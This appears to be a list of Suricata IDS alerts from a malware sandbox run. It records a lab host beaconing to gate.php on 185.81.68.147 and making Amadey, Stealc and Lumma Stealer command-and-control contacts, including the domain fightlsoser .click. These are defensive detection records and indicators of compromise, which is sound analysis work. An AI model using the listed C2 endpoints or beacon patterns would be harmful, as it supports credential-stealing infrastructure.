                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50067 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50067 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50068 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50068 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50068 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50070 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50070 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50070 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50071 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50071 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50071 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50075 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50075 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50075 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50072 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50072 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50072 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.10:50078 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50080 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50080 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50080 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50091 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50091 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50091 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50085 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50085 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50085 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50104 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50104 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50104 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50120 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50120 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50120 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50076 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50076 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50076 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50124 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50124 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50124 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50127 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50127 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50127 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50128 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50128 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50128 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50131 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50131 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50131 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50134 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50134 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50134 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50136 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50136 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50136 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50139 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50139 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50139 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50141 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50141 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50141 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50146 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50148 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50148 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50148 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50146 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50146 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50156 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50156 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50156 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50150 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50147 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50150 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50147 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50147 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50165 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50150 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50176 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50176 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50176 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50192 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50192 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50192 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50165 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50165 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50184 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50184 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50184 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50182 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50182 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50182 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50195 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50195 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50195 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50164 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50164 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50164 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50174 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50174 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50174 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50202 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50202 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50202 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50196 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50196 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50196 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50221 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50233 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50233 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50233 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50221 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50207 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50207 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50207 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50221 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50254 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50254 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50254 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50271 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50272 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50272 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50265 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50259 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50265 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50265 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:50255 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50288 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50275 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50275 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50272 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50263 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50258 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50258 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50288 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50288 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50299 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50275 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50261 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50261 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50268 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50268 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50268 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50261 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.10:50205 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50316 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50316 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50316 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50308 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50294 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50294 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50294 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50284 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50311 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50311 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50296 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50319 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50311 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50319 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50319 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50300 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50300 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50300 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50329 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50329 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50329 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50339 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50339 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50339 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50330 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50330 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50332 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50330 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50332 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50332 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50243 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50243 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50243 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058159 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click) : 192.168.2.10:59721 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50258 -> 185.81.68.147:80
